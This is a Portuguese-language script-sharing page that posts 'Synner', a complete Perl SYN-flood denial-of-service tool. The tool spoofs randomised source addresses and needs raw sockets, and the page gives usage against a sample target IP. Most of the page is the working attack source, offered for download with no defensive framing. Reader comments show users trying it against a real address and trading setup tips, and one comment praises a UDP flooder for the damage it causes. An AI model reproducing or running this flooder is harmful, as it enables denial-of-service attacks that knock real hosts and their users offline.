Synner Novo Sys(TCP) Flooder em Perl

Publicado por Franzé Jr Magalhães 01/01/2006

[ Hits: 10.584 ]

Download flooder.pl.txt





Ferramenta muito similar a outros flooders Sys TCP. Essa trabalha mandando pacotes Sys ao host e a porta específicada. Diferente de outros flooders, Synner consome toda a conexão.

Use: ./synner.pl IP PORTA TEMPO
Ex.: ./synner.pl 200.151.20.141 80 10

É necessário que você tenha o Net::RawIP instalado.

Perceba:

# WARNING: Never tested in real world :}

Garanto que eu também não testei, mas existe um comentário na Securiteam que é uma ótima ferramenta.

Fonte:
http://www.securiteam.com/tools/6K00M0KEUW.html

  



Esconder código-fonte

#!/usr/bin/perl 
# 
# Synner.pl 
# 
# Other Spoof-DoS tool written by nuTshell 
# <carloslack at gmail dot com> 
# <http://gotfault.net/~nutshell> 
# 
# Description: 
# This small tool is similar many other tcp syn flooders out there. 
# It works sending syn tcp packets to destination host:port, 
# spoofing it`s own ip addresses by sending randon source host:port 
# packets. 
# Be carefull, becouse you really need strong link otherwise 
# you`ll get f*. Unlike panic.pl , synner.pl consumes much 
# bandwidth resources. 
# 
# Required: 
# Install Net::RawIP from cpan or get it`s .tar,gz from somewhere. 
# It`s up to you. 
# 
# This tool does SPOOF your ip. 
# 
# Run it as ROOT (Net::RawIP needs). 
# Usage: ./synner.pl <ip> <port> <time> 
# 
# Greetz goes to: Shorgen, hexdump, Codak, khz, spidersoft, 
# Barros, xgc, btaranto, Acid-Warz, F-117... 
# 
# WARNING: Never tested in real world :} 
# 

#Make sure to get and install this module from cpan: 
use Net::RawIP; 

#Display help message: 
sub usage() { 
die "Use $0 <ip> <port> <time>n"; 
} 

#Function to control synner`s execution time: 
sub get_time() { 
$finaltime = time; 
$endme = $finaltime-$begintime; 
} 

#Bit useless...: 
if (@ARGV>3) {&usage} 

$ipdest = $ARGV[0] or &usage; 
$destport = $ARGV[1] or &usage; 

#Time is required to avoid endless execution (keep in mind that synner eats bandwidth): 
$time = $ARGV[2] or &usage; 

#Source port of our packets, include as many as you want: 
@tmpport = (1756,1026,1739,4055,2001,3055,1999,2873,20000,5476,9132,6000,9000,1234); 

#2 arrays that will give us randon ip addr: 
@iparray_round1 = (1,2); 
@iparray_round2 = (0,1,2,3,4,5,6,7,8,9); 

print "[!] Synpack.pl spoof-DoS tool written by nuTshelln"; 
print "[!] You better have huge link :)n"; 
print "[!] Time: $timen"; 
print "[!] Destination victin-> $ipdest:$destportn"; 

#Set $packet as handle of our raw packets: 
$packet = new Net::RawIP; 

#Get start time: 
$begintime = $^T; 

#Call get_time(): 
get_time(); 

while($endme < $time) { 

#Now build randon xxx.xxx.xxx.xxx: 
for ($z=0;$z<4;$z++) { 

#I use number 2 for every first numbers of each octet: 
for($I=0;$I<1;$I++) { 
$ip .= 2; 
} 
#Here i keep two options for every second numbers of each octet: 
for($kick=0;$kick<1;$kick++) { 
$iparray_round1 = $iparray_round1[rand(@iparray_round1)] ; 
$ip .= $iparray_round1; 
} 
#For all the last third of each octets i use range between 0<->9: 
for($you=0;$you<1;$you++) { 
$iparray_round2 = $iparray_round2[rand(@iparray_round2)] ; 
$ip .= $iparray_round2; 
} 

#Insert dot between each octet: 
$ip .= "."; 
} 

#The last one dot must be erased: 
chop($ip); 

#Routine to create/send spoofed packets, thanks to Net::RawIP: 
$tmpport = $tmpport[rand(@tmpport)]; 
$packet->set( 
{ 
ip => { saddr => $ip, #Victin ip 
daddr => $ipdest #Victin port 
}, 

tcp => { source => $tmpport, #Source ip(Spoofed and randomized) 
dest => $destport, #source port(Randomized) 
psh => 1, 
ack => 0, 
syn => 1, 
data => '31337' 
} 
} 
); 

#Send it: 
$packet->send(0,1) ; 

print "[*] From-> $ip:randon_portr"; 

#Reset last ip for new one: 
$ip = ''; 

#Call get_time(): 
get_time(); 

} 
#That`s all folks! 
print "nDone!n"; 
#eof

Scripts recomendados

Descubra se seu e-mail ou conta foi "pwned"

Pesquisar palavras no Diário Oficial da União

Postando mensagem no Facebook com Perl

AUTENTICACAO VELOX

Localizador de palavras em arquivos nao binarios


  

Comentários
[1] Comentário enviado por globoleo em 22/02/2006 - 03:27h

tenho certeza que ce nunca usou

eu tbm juro que nunca usei


[2] Comentário enviado por c0cac00l em 10/10/2009 - 08:31h

Estou com um pequeno problema..

$ perl tcpflooder.pl 174.132.77.99 80 10
(rawsock) socket problems [fatal] at /usr/lib/perl5/Net/RawIP.pm line 620.
[!] Synpack.pl spoof-DoS tool written by nuTshelln[!] You better have huge link :)n[!] Time: [!] Destination victin-> 174.132.77.99:

[3] Comentário enviado por kennedyk1 em 29/09/2010 - 10:43h

Para o syn flooder funcionar, vc tem que ter instalado em seu pc, o net::rawip.

antes de instalar o net::rawip, instale o libpcap.

#apt-get install libpcap0.8-dev

baixe o net::rawip no site da Cpan

http://search.cpan.org/CPAN/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz

instale o net::rawip

e ai vc conseguirá rodar o synflooder.

obs: O synflooder só funfa se vc estiver no modo superusuario (root).

[4] Comentário enviado por kennedyk1 em 29/09/2010 - 10:47h

Sou mais o udp-flooder.
Roda em qlq linux sem nenhuma baboseira.
Dizem que é mais facil de ser evitado, mas qnd nao evitado, faz um estrago.

[5] Comentário enviado por removido em 29/07/2011 - 01:27h

o que pode estar causando este erro

Can't locate Net/RawIP.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at /root/Net-RawIP-0.25/Flood.pl line 34.
BEGIN failed--compilation aborted at /root/Net-RawIP-0.25/Flood.pl line 34.

[6] Comentário enviado por removido em 29/07/2011 - 01:28h

root@Kouback-REDHAT:~/Net-RawIP-0.25# '/root/Net-RawIP-0.25/Makefile.PL'
/root/Net-RawIP-0.25/Makefile.PL: linha 1: use: comando não encontrado
/root/Net-RawIP-0.25/Makefile.PL: linha 2: use: comando não encontrado
/root/Net-RawIP-0.25/Makefile.PL: linha 3: use: comando não encontrado
/root/Net-RawIP-0.25/Makefile.PL: linha 4: use: comando não encontrado
/root/Net-RawIP-0.25/Makefile.PL: linha 5: use: comando não encontrado
/root/Net-RawIP-0.25/Makefile.PL: linha 7: erro de sintaxe próximo do `token' não esperado `('
/root/Net-RawIP-0.25/Makefile.PL: linha 7: `my %config = ('
root@Kouback-REDHAT:~/Net-RawIP-0.25# '/root/Net-RawIP-0.25/Flood.pl'
Can't locate Net/RawIP.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at /root/Net-RawIP-0.25/Flood.pl line 34.
BEGIN failed--compilation aborted at /root/Net-RawIP-0.25/Flood.pl line 34.
root@Kouback-REDHAT:~/Net-RawIP-0.25#


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts